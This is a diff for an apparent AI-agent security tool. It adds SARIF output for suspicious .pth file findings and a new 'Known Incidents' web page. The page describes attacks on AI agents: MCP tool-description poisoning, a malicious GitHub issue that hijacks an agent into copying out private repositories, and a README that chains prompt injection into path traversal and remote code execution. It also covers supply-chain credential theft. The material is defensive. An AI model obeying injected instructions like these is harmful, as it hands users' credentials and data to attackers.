+                    "name": f"PthFile{'Critical' if pth_finding.severity == 'CRITICAL' else 'Warning'}",
+                    "shortDescription": {
+                        "text": f"Suspicious .pth file: {pth_finding.pattern}",
+                    },
+                    "defaultConfiguration": {
+                        "level": _pth_sarif_level.get(pth_finding.severity, "warning"),
+                    },
+                    "helpUri": "https://agentward.ai/docs/supply-chain",
+                })
+
+            import os as _os
+            uri = pth_finding.file.replace("\\", "/")
+            result_entry: dict = {
+                "ruleId": rule_id,
+                "level": _pth_sarif_level.get(pth_finding.severity, "warning"),
+                "message": {"text": pth_finding.description},
+                "locations": [{
+                    "physicalLocation": {
+                        "artifactLocation": {
+                            "uri": uri,
+                            "uriBaseId": "SITE_PACKAGES",
+                        },
+                    },
+                }],
+            }
+            if pth_finding.line_number is not None:
+                result_entry["locations"][0]["physicalLocation"]["region"] = {
+                    "startLine": pth_finding.line_number,
+                }
+            results.append(result_entry)
+
     sarif = {
         "$schema": "https://schemastore.azurewebsites.net/schemas/json/sarif-2.1.0-rtm.5.json",
         "version": "2.1.0",

--- a/docs/Site/about.html
+++ b/docs/Site/about.html
@@ -93,6 +93,7 @@
     <a href="how-it-works.html">How It Works</a>
     <a href="docs.html">Docs</a>
     <a href="compare.html">Compare</a>
+    <a href="incidents.html">Known Incidents</a>
     <a href="about.html" class="active">About</a>
     <a href="https://github.com/agentward-ai/agentward" target="_blank" rel="noopener" class="nav-gh">
       <svg width="14" height="14" viewBox="0 0 24 24" fill="currentColor"><path d="M12 0C5.37 0 0 5.37 0 12c0 5.31 3.435 9.795 8.205 11.385.6.105.825-.255.825-.57 0-.285-.015-1.23-.015-2.235-3.015.555-3.795-.735-4.035-1.41-.135-.345-.72-1.41-1.23-1.695-.42-.225-1.02-.78-.015-.795.945-.015 1.62.87 1.845 1.23 1.08 1.815 2.805 1.305 3.495.99.105-.78.42-1.305.765-1.605-2.67-.3-5.46-1.335-5.46-5.925 0-1.305.465-2.385 1.23-3.225-.12-.3-.54-1.53.12-3.18 0 0 1.005-.315 3.3 1.23.96-.27 1.98-.405 3-.405s2.04.135 3 .405c2.295-1.56 3.3-1.23 3.3-1.23.66 1.65.24 2.88.12 3.18.765.84 1.23 1.905 1.23 3.225 0 4.605-2.805 5.625-5.475 5.925.435.375.81 1.095.81 2.22 0 1.605-.015 2.895-.015 3.3 0 .315.225.69.825.57A12.02 12.02 0 0024 12c0-6.63-5.37-12-12-12z"/></svg>
@@ -108,6 +109,7 @@
   <a href="how-it-works.html">How It Works</a>
   <a href="docs.html">Docs</a>
   <a href="compare.html">Compare</a>
+  <a href="incidents.html">Known Incidents</a>
   <a href="about.html" class="active">About</a>
   <a href="https://github.com/agentward-ai/agentward" target="_blank" rel="noopener">GitHub</a>
 </div>
@@ -156,6 +158,7 @@
     <a href="how-it-works.html">How It Works</a>
     <a href="docs.html">Docs</a>
     <a href="compare.html">Compare</a>
+    <a href="incidents.html">Known Incidents</a>
     <a href="about.html">About</a>
     <a href="https://github.com/agentward-ai/agentward" target="_blank">GitHub</a>
   </div>

--- a/docs/Site/compare.html
+++ b/docs/Site/compare.html
@@ -128,6 +128,7 @@
     <a href="how-it-works.html">How It Works</a>
     <a href="docs.html">Docs</a>
     <a href="compare.html" class="active">Compare</a>
+    <a href="incidents.html">Known Incidents</a>
     <a href="about.html">About</a>
     <a href="https://github.com/agentward-ai/agentward" target="_blank" rel="noopener" class="nav-gh">
       <svg width="14" height="14" viewBox="0 0 24 24" fill="currentColor"><path d="M12 0C5.37 0 0 5.37 0 12c0 5.31 3.435 9.795 8.205 11.385.6.105.825-.255.825-.57 0-.285-.015-1.23-.015-2.235-3.015.555-3.795-.735-4.035-1.41-.135-.345-.72-1.41-1.23-1.695-.42-.225-1.02-.78-.015-.795.945-.015 1.62.87 1.845 1.23 1.08 1.815 2.805 1.305 3.495.99.105-.78.42-1.305.765-1.605-2.67-.3-5.46-1.335-5.46-5.925 0-1.305.465-2.385 1.23-3.225-.12-.3-.54-1.53.12-3.18 0 0 1.005-.315 3.3 1.23.96-.27 1.98-.405 3-.405s2.04.135 3 .405c2.295-1.56 3.3-1.23 3.3-1.23.66 1.65.24 2.88.12 3.18.765.84 1.23 1.905 1.23 3.225 0 4.605-2.805 5.625-5.475 5.925.435.375.81 1.095.81 2.22 0 1.605-.015 2.895-.015 3.3 0 .315.225.69.825.57A12.02 12.02 0 0024 12c0-6.63-5.37-12-12-12z"/></svg>
@@ -143,6 +144,7 @@
   <a href="how-it-works.html">How It Works</a>
   <a href="docs.html">Docs</a>
   <a href="compare.html" class="active">Compare</a>
+  <a href="incidents.html">Known Incidents</a>
   <a href="about.html">About</a>
   <a href="https://github.com/agentward-ai/agentward" target="_blank" rel="noopener">GitHub</a>
 </div>
@@ -433,6 +435,7 @@
     <a href="index.html">Home</a>
     <a href="how-it-works.html">How It Works</a>
     <a href="docs.html">Docs</a>
+    <a href="incidents.html">Known Incidents</a>
     <a href="about.html">About</a>
     <a href="https://github.com/agentward-ai/agentward" target="_blank">GitHub</a>
   </div>

--- a/docs/Site/docs.html
+++ b/docs/Site/docs.html
@@ -163,6 +163,7 @@
     <a href="how-it-works.html">How It Works</a>
     <a href="docs.html" class="active">Docs</a>
     <a href="compare.html">Compare</a>
+    <a href="incidents.html">Known Incidents</a>
     <a href="about.html">About</a>
     <a href="https://github.com/agentward-ai/agentward" target="_blank" rel="noopener" class="nav-gh">
       <svg width="14" height="14" viewBox="0 0 24 24" fill="currentColor"><path d="M12 0C5.37 0 0 5.37 0 12c0 5.31 3.435 9.795 8.205 11.385.6.105.825-.255.825-.57 0-.285-.015-1.23-.015-2.235-3.015.555-3.795-.735-4.035-1.41-.135-.345-.72-1.41-1.23-1.695-.42-.225-1.02-.78-.015-.795.945-.015 1.62.87 1.845 1.23 1.08 1.815 2.805 1.305 3.495.99.105-.78.42-1.305.765-1.605-2.67-.3-5.46-1.335-5.46-5.925 0-1.305.465-2.385 1.23-3.225-.12-.3-.54-1.53.12-3.18 0 0 1.005-.315 3.3 1.23.96-.27 1.98-.405 3-.405s2.04.135 3 .405c2.295-1.56 3.3-1.23 3.3-1.23.66 1.65.24 2.88.12 3.18.765.84 1.23 1.905 1.23 3.225 0 4.605-2.805 5.625-5.475 5.925.435.375.81 1.095.81 2.22 0 1.605-.015 2.895-.015 3.3 0 .315.225.69.825.57A12.02 12.02 0 0024 12c0-6.63-5.37-12-12-12z"/></svg>
@@ -178,6 +179,7 @@
   <a href="how-it-works.html">How It Works</a>
   <a href="docs.html" class="active">Docs</a>
   <a href="compare.html">Compare</a>
+  <a href="incidents.html">Known Incidents</a>
   <a href="about.html">About</a>
   <a href="https://github.com/agentward-ai/agentward" target="_blank" rel="noopener">GitHub</a>
 </div>
@@ -735,6 +737,7 @@ agentward inspect --gateway clawdbot --policy agentward.yaml</pre>
     <a href="index.html">Home</a>
     <a href="how-it-works.html">How It Works</a>
     <a href="compare.html">Compare</a>
+    <a href="incidents.html">Known Incidents</a>
     <a href="about.html">About</a>
     <a href="https://github.com/agentward-ai/agentward" target="_blank">GitHub</a>
   </div>

--- a/docs/Site/how-it-works.html
+++ b/docs/Site/how-it-works.html
@@ -144,6 +144,7 @@
     <a href="how-it-works.html" class="active">How It Works</a>
     <a href="docs.html">Docs</a>
     <a href="compare.html">Compare</a>
+    <a href="incidents.html">Known Incidents</a>
     <a href="about.html">About</a>
     <a href="https://github.com/agentward-ai/agentward" target="_blank" rel="noopener" class="nav-gh">
       <svg width="14" height="14" viewBox="0 0 24 24" fill="currentColor"><path d="M12 0C5.37 0 0 5.37 0 12c0 5.31 3.435 9.795 8.205 11.385.6.105.825-.255.825-.57 0-.285-.015-1.23-.015-2.235-3.015.555-3.795-.735-4.035-1.41-.135-.345-.72-1.41-1.23-1.695-.42-.225-1.02-.78-.015-.795.945-.015 1.62.87 1.845 1.23 1.08 1.815 2.805 1.305 3.495.99.105-.78.42-1.305.765-1.605-2.67-.3-5.46-1.335-5.46-5.925 0-1.305.465-2.385 1.23-3.225-.12-.3-.54-1.53.12-3.18 0 0 1.005-.315 3.3 1.23.96-.27 1.98-.405 3-.405s2.04.135 3 .405c2.295-1.56 3.3-1.23 3.3-1.23.66 1.65.24 2.88.12 3.18.765.84 1.23 1.905 1.23 3.225 0 4.605-2.805 5.625-5.475 5.925.435.375.81 1.095.81 2.22 0 1.605-.015 2.895-.015 3.3 0 .315.225.69.825.57A12.02 12.02 0 0024 12c0-6.63-5.37-12-12-12z"/></svg>
@@ -159,6 +160,7 @@
   <a href="how-it-works.html" class="active">How It Works</a>
   <a href="docs.html">Docs</a>
   <a href="compare.html">Compare</a>
+  <a href="incidents.html">Known Incidents</a>
   <a href="about.html">About</a>
   <a href="https://github.com/agentward-ai/agentward" target="_blank" rel="noopener">GitHub</a>
 </div>
@@ -484,6 +486,7 @@
     <a href="index.html">Home</a>
     <a href="docs.html">Docs</a>
     <a href="compare.html">Compare</a>
+    <a href="incidents.html">Known Incidents</a>
     <a href="about.html">About</a>
     <a href="https://github.com/agentward-ai/agentward" target="_blank">GitHub</a>
   </div>

--- a/docs/Site/incidents.html
+++ b/docs/Site/incidents.html
@@ -1,0 +1,402 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8"/>
+  <meta name="viewport" content="width=device-width,initial-scale=1.0"/>
+  <title>Real-World Incidents — AgentWard</title>
+  <meta name="description" content="How AgentWard responds to real AI agent security incidents — LiteLLM supply chain, ClawHavoc, MCP tool poisoning, and more."/>
+  <link rel="icon" type="image/svg+xml" href="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA0OCA0OCI+CiAgPHJlY3Qgd2lkdGg9IjQ4IiBoZWlnaHQ9IjQ4IiByeD0iOCIgZmlsbD0iIzBhMGEwYSIvPgogIDxwYXRoIGQ9Ik0yNCA0TDYgMTJ2MTJjMCAxMS4xIDcuNyAyMS41IDE4IDI0IDEwLjMtMi41IDE4LTEyLjkgMTgtMjRWMTJMMjQgNHoiIGZpbGw9IiMxMTEiIHN0cm9rZT0iIzAwZmY4OCIgc3Ryb2tlLXdpZHRoPSIyIi8+CiAgPHBhdGggZD0iTTE4IDI0bDQgNCA4LTgiIHN0cm9rZT0iIzAwZmY4OCIgc3Ryb2tlLXdpZHRoPSIyLjUiIHN0cm9rZS1saW5lY2FwPSJyb3VuZCIgc3Ryb2tlLWxpbmVqb2luPSJyb3VuZCIgZmlsbD0ibm9uZSIvPgo8L3N2Zz4=">
+  <link rel="preconnect" href="https://fonts.googleapis.com"/>
+  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin/>
+  <link href="https://fonts.googleapis.com/css2?family=IBM+Plex+Mono:wght@400;500;600&family=IBM+Plex+Sans:wght@400;500;600;700&display=swap" rel="stylesheet"/>
+  <style>
+    *{box-sizing:border-box;margin:0;padding:0}
+    :root{
+      --green:#00ff88;--green2:#00cc6a;--green-dim:#00ff8820;--green-border:#00ff8830;
+      --bg:#080808;--bg1:#0d0d0d;--bg2:#111;--bg3:#161616;
+      --border:#1c1c1c;--border2:#242424;
+      --text:#d8d8d8;--muted:#666;--muted2:#444;--white:#f0f0f0;
+      --red:#ff4444;--yellow:#ffcc00;--orange:#ff8c42;
+      --font-sans:'IBM Plex Sans',system-ui,sans-serif;
+      --font-mono:'IBM Plex Mono',monospace;
+    }
+    html{scroll-behavior:smooth}
+    body{background:var(--bg);color:var(--text);font-family:var(--font-sans);min-height:100vh;line-height:1.6}
+    ::selection{background:var(--green-dim)}
+    a{color:var(--green);text-decoration:none}
+    a:hover{color:var(--green2)}
+
+    /* ── Nav ── */
+    nav{position:sticky;top:0;z-index:200;height:52px;padding:0 24px;display:flex;align-items:center;justify-content:space-between;background:rgba(8,8,8,0.94);backdrop-filter:blur(16px);border-bottom:1px solid var(--border)}
+    .nav-logo{display:flex;align-items:center;gap:10px;color:var(--white);font-weight:600;font-size:15px;letter-spacing:-0.3px}
+    .nav-links{display:flex;align-items:center;gap:2px}
+    .nav-links a{padding:5px 12px;border-radius:6px;font-size:13px;font-weight:500;color:var(--muted);transition:color .15s,background .15s}
+    .nav-links a:hover{color:var(--white);background:var(--bg2)}
+    .nav-links a.active{color:var(--green);background:var(--green-dim)}
+    .nav-gh{display:flex;align-items:center;gap:7px;padding:6px 14px;border-radius:7px;background:var(--green);color:var(--bg)!important;font-size:12.5px;font-weight:600;margin-left:8px;transition:background .15s}
+    .nav-gh:hover{background:var(--green2)!important}
+    .nav-hamburger{display:none;background:none;border:none;cursor:pointer;padding:6px}
+    .nav-hamburger svg{display:block}
+    .nav-mobile{display:none;position:absolute;top:52px;left:0;right:0;background:rgba(8,8,8,0.98);backdrop-filter:blur(16px);border-bottom:1px solid var(--border);padding:8px 16px 12px;z-index:199;flex-direction:column;gap:2px}
+    .nav-mobile.open{display:flex}
+    .nav-mobile a{display:block;padding:10px 14px;border-radius:6px;font-size:14px;font-weight:500;color:var(--muted);transition:color .15s,background .15s}
+    .nav-mobile a:hover{color:var(--white);background:var(--bg2)}
+    .nav-mobile a.active{color:var(--green);background:var(--green-dim)}
+    @media(max-width:600px){.nav-links{display:none}.nav-hamburger{display:block}}
+
+    /* ── Hero ── */
+    .page-hero{
+      padding:72px 24px 52px;max-width:860px;margin:0 auto;
+      background:radial-gradient(ellipse 60% 30% at 50% 0%,#00ff8806 0%,transparent 65%);
+    }
+    .eyebrow{font-family:var(--font-mono);font-size:10.5px;font-weight:600;color:var(--green);letter-spacing:2px;text-transform:uppercase;margin-bottom:14px}
+    .page-title{font-size:clamp(26px,4vw,40px);font-weight:700;color:var(--white);letter-spacing:-1px;margin-bottom:16px;line-height:1.1}
+    .page-sub{font-size:15.5px;color:var(--muted);line-height:1.75;max-width:620px}
+
+    /* ── Summary pills ── */
+    .summary-row{
+      display:flex;gap:12px;flex-wrap:wrap;
+      max-width:860px;margin:0 auto;padding:0 24px 52px;
+    }
+    .pill{
+      display:flex;align-items:center;gap:8px;
+      padding:8px 16px;border-radius:8px;border:1px solid var(--border2);
+      font-size:13px;font-weight:500;
+    }
+    .pill-yes{background:#00ff8810;border-color:#00ff8828;color:var(--green)}
+    .pill-no{background:#ff444410;border-color:#ff444428;color:var(--red)}
+    .pill-dot{width:7px;height:7px;border-radius:50%}
+    .pill-yes .pill-dot{background:var(--green)}
+    .pill-no .pill-dot{background:var(--red)}
+
+    /* ── Incident cards ── */
+    .incidents{max-width:860px;margin:0 auto;padding:0 24px 80px;display:flex;flex-direction:column;gap:14px}
+
+    .incident{
+      border-radius:12px;border:1px solid var(--border);
+      background:var(--bg1);overflow:hidden;
+      transition:border-color .2s;
+    }
+    .incident:hover{border-color:var(--border2)}
+    .incident.yes{border-left:3px solid var(--green)}
+    .incident.no{border-left:3px solid #ff444450}
+
+    .incident-header{
+      display:flex;align-items:flex-start;gap:16px;
+      padding:22px 24px 18px;
+      cursor:pointer;
+      user-select:none;
+    }
+    .incident-header:hover .inc-title{color:var(--white)}
+
+    .inc-badge{
+      flex-shrink:0;margin-top:2px;
+      font-family:var(--font-mono);font-size:10px;font-weight:700;
+      padding:3px 10px;border-radius:5px;letter-spacing:0.5px;
+    }
+    .inc-badge.yes{background:#00ff8818;color:var(--green);border:1px solid #00ff8830}
+    .inc-badge.no{background:#ff444418;color:var(--red);border:1px solid #ff444430}
+
+    .inc-meta{flex:1;min-width:0}
+    .inc-title{font-size:15px;font-weight:600;color:#ccc;margin-bottom:5px;transition:color .15s;line-height:1.4}
+    .inc-desc{font-size:13.5px;color:var(--muted);line-height:1.6}
+
+    .inc-date{
+      flex-shrink:0;
+      font-family:var(--font-mono);font-size:10.5px;color:var(--muted2);
+      white-space:nowrap;margin-top:3px;
+    }
+
+    .incident-body{
+      padding:0 24px 22px 64px;
+      border-top:1px solid var(--border);
+    }
+
+    .inc-how{
+      padding-top:18px;
+    }
+    .inc-how-label{
+      font-family:var(--font-mono);font-size:10px;font-weight:600;
+      color:var(--green);letter-spacing:1.5px;text-transform:uppercase;
+      margin-bottom:8px;
+    }
+    .inc-how-label.no-label{color:#ff4444}
+    .inc-how p{font-size:14px;line-height:1.7;color:#bbb}
+    .inc-how p strong{color:var(--white)}
+
+    .inc-type{
+      display:inline-flex;align-items:center;gap:6px;
+      margin-top:12px;
+      font-family:var(--font-mono);font-size:10.5px;color:var(--muted2);
+    }
+    .inc-type-dot{width:5px;height:5px;border-radius:50%;background:var(--muted2)}
+
+    /* ── Disclaimer ── */
+    .disclaimer{
+      max-width:860px;margin:0 auto;padding:0 24px 72px;
+    }
+    .disclaimer-box{
+      background:var(--bg2);border:1px solid var(--border2);
+      border-radius:10px;padding:20px 24px;
+      font-size:13.5px;color:var(--muted);line-height:1.7;
+    }
+    .disclaimer-box strong{color:#aaa}
+
+    /* ── Footer ── */
+    footer{border-top:1px solid var(--border);padding:24px;display:flex;align-items:center;justify-content:space-between;flex-wrap:wrap;gap:12px}
+    .footer-logo{display:flex;align-items:center;gap:8px;color:var(--muted2);font-size:13px}
+    .footer-links{display:flex;gap:16px;font-size:13px;flex-wrap:wrap}
+    .footer-links a{color:var(--muted);transition:color .15s}
+    .footer-links a:hover{color:var(--green)}
+    .footer-right{font-size:12px;color:var(--muted2);font-family:var(--font-mono)}
+    @media(max-width:600px){footer{flex-direction:column;text-align:center}}
+
+    @media(max-width:560px){
+      .incident-body{padding-left:24px}
+      .inc-date{display:none}
+    }
+  </style>
+</head>
+<body>
+
+<nav>
+  <a href="index.html" class="nav-logo">
+    <svg width="24" height="24" viewBox="0 0 48 48" fill="none">
+      <path d="M24 4L6 12v12c0 11.1 7.7 21.5 18 24 10.3-2.5 18-12.9 18-24V12L24 4z" fill="#0d1a0d" stroke="#00ff88" stroke-width="2.5"/>
+      <path d="M17 24l5 5 9-9" stroke="#00ff88" stroke-width="2.5" stroke-linecap="round" stroke-linejoin="round"/>
+    </svg>
+    AgentWard
+  </a>
+  <div class="nav-links">
+    <a href="index.html">Home</a>
+    <a href="how-it-works.html">How It Works</a>
+    <a href="docs.html">Docs</a>
+    <a href="compare.html">Compare</a>
+    <a href="incidents.html" class="active">Known Incidents</a>
+    <a href="about.html">About</a>
+    <a href="https://github.com/agentward-ai/agentward" target="_blank" rel="noopener" class="nav-gh">
+      <svg width="14" height="14" viewBox="0 0 24 24" fill="currentColor"><path d="M12 0C5.37 0 0 5.37 0 12c0 5.31 3.435 9.795 8.205 11.385.6.105.825-.255.825-.57 0-.285-.015-1.23-.015-2.235-3.015.555-3.795-.735-4.035-1.41-.135-.345-.72-1.41-1.23-1.695-.42-.225-1.02-.78-.015-.795.945-.015 1.62.87 1.845 1.23 1.08 1.815 2.805 1.305 3.495.99.105-.78.42-1.305.765-1.605-2.67-.3-5.46-1.335-5.46-5.925 0-1.305.465-2.385 1.23-3.225-.12-.3-.54-1.53.12-3.18 0 0 1.005-.315 3.3 1.23.96-.27 1.98-.405 3-.405s2.04.135 3 .405c2.295-1.56 3.3-1.23 3.3-1.23.66 1.65.24 2.88.12 3.18.765.84 1.23 1.905 1.23 3.225 0 4.605-2.805 5.625-5.475 5.925.435.375.81 1.095.81 2.22 0 1.605-.015 2.895-.015 3.3 0 .315.225.69.825.57A12.02 12.02 0 0024 12c0-6.63-5.37-12-12-12z"/></svg>
+      GitHub
+    </a>
+  </div>
+  <button class="nav-hamburger" onclick="document.getElementById('mobile-menu').classList.toggle('open')" aria-label="Menu">
+    <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="#999" stroke-width="2" stroke-linecap="round"><line x1="3" y1="6" x2="21" y2="6"/><line x1="3" y1="12" x2="21" y2="12"/><line x1="3" y1="18" x2="21" y2="18"/></svg>
+  </button>
+</nav>
+<div class="nav-mobile" id="mobile-menu">
+  <a href="index.html">Home</a>
+  <a href="how-it-works.html">How It Works</a>
+  <a href="docs.html">Docs</a>
+  <a href="compare.html">Compare</a>
+  <a href="incidents.html" class="active">Incidents</a>
+  <a href="about.html">About</a>
+  <a href="https://github.com/agentward-ai/agentward" target="_blank" rel="noopener">GitHub</a>
+</div>
+
+<div class="page-hero">
+  <div class="eyebrow">Real-World Incidents</div>
+  <h1 class="page-title">How AgentWard responds<br>to real attacks</h1>
+  <p class="page-sub">A factual record of known AI agent security incidents and exactly what AgentWard catches — and what it doesn't. We're not trying to claim coverage we don't have.</p>
+</div>
+
+<div class="summary-row">
+  <div class="pill pill-yes">
+    <div class="pill-dot"></div>
+    6 incidents caught
+  </div>
+  <div class="pill pill-no">
+    <div class="pill-dot"></div>
+    2 outside AgentWard's layer
+  </div>
+</div>
+
+<div class="incidents">
+
+  <!-- 1. LiteLLM -->
+  <div class="incident yes">
+    <div class="incident-header">
+      <span class="inc-badge yes">CAUGHT</span>
+      <div class="inc-meta">
+        <div class="inc-title">LiteLLM supply chain attack (TeamPCP)</div>
+        <div class="inc-desc">3.4 million daily downloads backdoored via a hidden file that ran malicious code on every Python startup. Downstream victims included Microsoft GraphRAG, Google ADK, CrewAI, and DSPy.</div>
+      </div>
+      <div class="inc-date">Mar 2026</div>
+    </div>
+    <div class="incident-body">
+      <div class="inc-how">
+        <div class="inc-how-label">How AgentWard catches this</div>
+        <p>The attackers planted a file called <strong>litellm_init.pth</strong> in Python's site-packages directory. Any line starting with <code>import</code> in a .pth file runs automatically every time Python starts — no one ever calls it, imports it, or sees it in normal use. This one used double-encoded base64 to hide a credential-stealing payload.</p>
+        <p style="margin-top:10px"><strong><code>agentward scan --scan-site-packages</code></strong> walks every site-packages directory and flags .pth files containing executable code. The double base64 pattern triggers a CRITICAL finding immediately, before any Python process runs the payload.</p>
+      </div>
+      <div class="inc-type"><div class="inc-type-dot"></div>Supply chain · .pth backdoor · Credential theft</div>
+    </div>
+  </div>
+
+  <!-- 2. ClawHavoc -->
+  <div class="incident yes">
+    <div class="incident-header">
+      <span class="inc-badge yes">CAUGHT</span>
+      <div class="inc-meta">
+        <div class="inc-title">ClawHavoc — malicious skills on ClawHub</div>
+        <div class="inc-desc">~1,200 malicious skills published to ClawHub (roughly 20% of the ecosystem). The #1 downloaded skill installed AMOS credential-stealing malware. Snyk's audit found malicious payloads in 76 skills.</div>
+      </div>
+      <div class="inc-date">Jan–Feb 2026</div>
+    </div>
+    <div class="incident-body">
+      <div class="inc-how">
+        <div class="inc-how-label">How AgentWard catches this</div>
+        <p>Before installing any skill from a marketplace, run <strong><code>agentward scan ./skill-directory/</code></strong>. The pre-install scanner checks lifecycle scripts (postinstall, preinstall hooks), shell commands, and code patterns associated with credential theft — flagging them as CRITICAL before the skill ever runs on your machine.</p>
+        <p style="margin-top:10px">This is the same principle as reading a package's source before running <code>npm install</code> — except automated and threat-aware.</p>
+      </div>
+      <div class="inc-type"><div class="inc-type-dot"></div>Supply chain · Malicious marketplace skill · Malware dropper</div>
+    </div>
+  </div>
+
+  <!-- 3. MCP tool poisoning -->
+  <div class="incident yes">
+    <div class="incident-header">
+      <span class="inc-badge yes">CAUGHT</span>
+      <div class="inc-meta">
+        <div class="inc-title">MCP tool poisoning &amp; rug pull attacks</div>
+        <div class="inc-desc">Malicious MCP servers embed hidden instructions in tool descriptions that are invisible to users but followed by the AI. Variants include cross-server credential theft, a fake Postmark server that BCC'd every outgoing email to an attacker, and post-approval "rug pulls" where a tool's behavior changes after it passes vetting.</div>
+      </div>
+      <div class="inc-date">2025–ongoing</div>
+    </div>
+    <div class="incident-body">
+      <div class="inc-how">
+        <div class="inc-how-label">How AgentWard catches this</div>
+        <p>Every tool call is evaluated against your policy before it leaves your machine — regardless of what instructions the AI received. An agent manipulated into forwarding credentials to an attacker's server is blocked at the point of the call, not at the point of the instruction.</p>
+        <p style="margin-top:10px">The semantic intent layer adds a second check: it flags tool calls where the arguments don't match what the tool claims to do. A <strong><code>send_email</code></strong> call that adds an unexpected BCC recipient, or a file tool suddenly pointed at <code>~/.ssh/</code>, triggers a review before the action completes.</p>
+      </div>
+      <div class="inc-type"><div class="inc-type-dot"></div>Prompt injection · Tool description manipulation · Credential theft</div>
+    </div>
+  </div>
+
+  <!-- 4. GitHub MCP -->
+  <div class="incident yes">
+    <div class="incident-header">
+      <span class="inc-badge yes">CAUGHT</span>
+      <div class="inc-meta">
+        <div class="inc-title">GitHub MCP prompt injection — private repo exfiltration</div>
+        <div class="inc-desc">An attacker creates a malicious GitHub issue in a public repo. An AI agent reads it, gets hijacked by the embedded instructions, and starts exfiltrating data from the developer's private repositories to a public one.</div>
+      </div>
+      <div class="inc-date">May 2025</div>
+    </div>
+    <div class="incident-body">
+      <div class="inc-how">
+        <div class="inc-how-label">How AgentWard catches this</div>
+        <p>AgentWard enforces that tools can only write to destinations you've approved. An agent reading a public issue cannot suddenly start writing to unrelated repositories — that cross-repo move is blocked as a chaining violation the moment it's attempted.</p>
+        <p style="margin-top:10px">Capability scoping lets you restrict which repositories a tool can write to, turning the agent's broad GitHub token into a narrow, policy-bounded permission set.</p>
+      </div>
+      <div class="inc-type"><div class="inc-type-dot"></div>Prompt injection · Cross-repo data exfiltration · Skill chaining</div>
+    </div>
+  </div>
+
+  <!-- 5. Anthropic Git MCP CVEs -->
+  <div class="incident yes">
+    <div class="incident-header">
+      <span class="inc-badge yes">CAUGHT</span>
+      <div class="inc-meta">
+        <div class="inc-title">Anthropic Git MCP server — CVE-2025-68143/44/45</div>
+        <div class="inc-desc">Three chained vulnerabilities in Anthropic's official Git MCP server. A malicious README triggers prompt injection → path traversal → remote code execution via git's own file processing filters. No direct system access required.</div>
+      </div>
+      <div class="inc-date">Jan 2026</div>
+    </div>
+    <div class="incident-body">
+      <div class="inc-how">
+        <div class="inc-how-label">How AgentWard catches this</div>
+        <p>Path traversal in tool arguments — <code>../</code> sequences, tilde expansion reaching outside the repository — is blocked by capability scoping before the call reaches the server. The semantic layer also flags file operations pointed at locations inconsistent with the agent's stated task.</p>
+        <p style="margin-top:10px">Note: AgentWard doesn't patch the server-side CVEs. You still need to update <code>mcp-server-git</code> to a patched version. What AgentWard blocks is the exploitation path — the argument values that trigger the vulnerability.</p>
+      </div>
+      <div class="inc-type"><div class="inc-type-dot"></div>Prompt injection · Path traversal · RCE via git filters</div>
+    </div>
+  </div>
+
+  <!-- 6. CVE-2026-25253 -->
+  <div class="incident yes">
+    <div class="incident-header">
+      <span class="inc-badge yes">CAUGHT</span>
+      <div class="inc-meta">
+        <div class="inc-title">CVE-2026-25253 — OpenClaw gateway token leak</div>
+        <div class="inc-desc">A malicious link tricks an authenticated user into handing over their OpenClaw gateway auth token, giving an attacker full administrative control over the gateway. CVSS 8.8.</div>
+      </div>
+      <div class="inc-date">Jan 2026</div>
+    </div>
+    <div class="incident-body">
+      <div class="inc-how">
+        <div class="inc-how-label">How AgentWard catches this</div>
+        <p>AgentWard can't prevent the token theft itself — that's a browser-level attack. But the stolen token doesn't grant the attacker anything beyond your existing policy. Every tool call through the gateway is still evaluated: they still can't exfiltrate files you haven't permitted, send email without approval, or execute shell commands you've blocked.</p>
+        <p style="margin-top:10px">Your credentials being stolen is a serious problem. Your agent's blast radius being bounded regardless is what AgentWard provides.</p>
+      </div>
+      <div class="inc-type"><div class="inc-type-dot"></div>Auth token exfiltration · Gateway compromise · Credential theft</div>
+    </div>
+  </div>
+
+  <!-- 7. LangGrinch - NO -->
+  <div class="incident no">
+    <div class="incident-header">
+      <span class="inc-badge no">NOT CAUGHT</span>
+      <div class="inc-meta">
+        <div class="inc-title">LangGrinch — CVE-2025-68664 (LangChain serialization injection)</div>
+        <div class="inc-desc">Prompt injection via an LLM response poisons LangChain's internal serialization. When the application deserializes the output (during logging, streaming, or memory operations), secrets leak from environment variables or arbitrary code runs. CVSS 9.3.</div>
+      </div>
+      <div class="inc-date">Dec 2025</div>
+    </div>
+    <div class="incident-body">
+      <div class="inc-how">
+        <div class="inc-how-label no-label">Why AgentWard doesn't catch this</div>
+        <p>This vulnerability lives inside LangChain's own serialization logic — below the tool call layer where AgentWard operates. By the time AgentWard sees a tool call, the exploit has already run inside the application. <strong>The fix is updating to <code>langchain-core ≥ 0.3.81</code></strong>, which patches the serialization allowlist and disables secrets-from-env by default.</p>
+      </div>
+      <div class="inc-type"><div class="inc-type-dot"></div>Serialization injection · Secrets exfiltration · RCE</div>
+    </div>
+  </div>
+
+  <!-- 8. mcp-remote - NO -->
+  <div class="incident no">
+    <div class="incident-header">
+      <span class="inc-badge no">NOT CAUGHT</span>
+      <div class="inc-meta">
+        <div class="inc-title">mcp-remote CVE-2025-6514 — OAuth command injection</div>
+        <div class="inc-desc">A malicious MCP server injects OS commands through the OAuth authorization URL. The mcp-remote proxy passes it unsanitized to a shell call, giving the attacker full code execution on the client machine. CVSS 9.6.</div>
+      </div>
+      <div class="inc-date">2025</div>
+    </div>
+    <div class="incident-body">
+      <div class="inc-how">
+        <div class="inc-how-label no-label">Why AgentWard doesn't catch this</div>
+        <p>The attack lands during the OAuth handshake, before a connection is established and before AgentWard sees any traffic. It's a vulnerability in the connection layer, not the tool call layer. <strong>Update mcp-remote to v0.1.16 or later.</strong></p>
+      </div>
+      <div class="inc-type"><div class="inc-type-dot"></div>OS command injection · OAuth layer · Full RCE</div>
+    </div>
+  </div>
+
+</div>
+
+<div class="disclaimer">
+  <div class="disclaimer-box">
+    <strong>On coverage claims:</strong> "Caught" means AgentWard has a specific mechanism that intercepts or flags this class of attack. It doesn't mean AgentWard is a complete solution — supply chain attacks evolve, and a sophisticated attacker who avoids known detection patterns may still get through. The "Not Caught" entries are here because the honest answer matters more than the marketing one. For those, the right fix is listed directly.
+  </div>
+</div>
+
+<footer>
+  <div class="footer-logo">
+    <svg width="18" height="18" viewBox="0 0 48 48" fill="none">
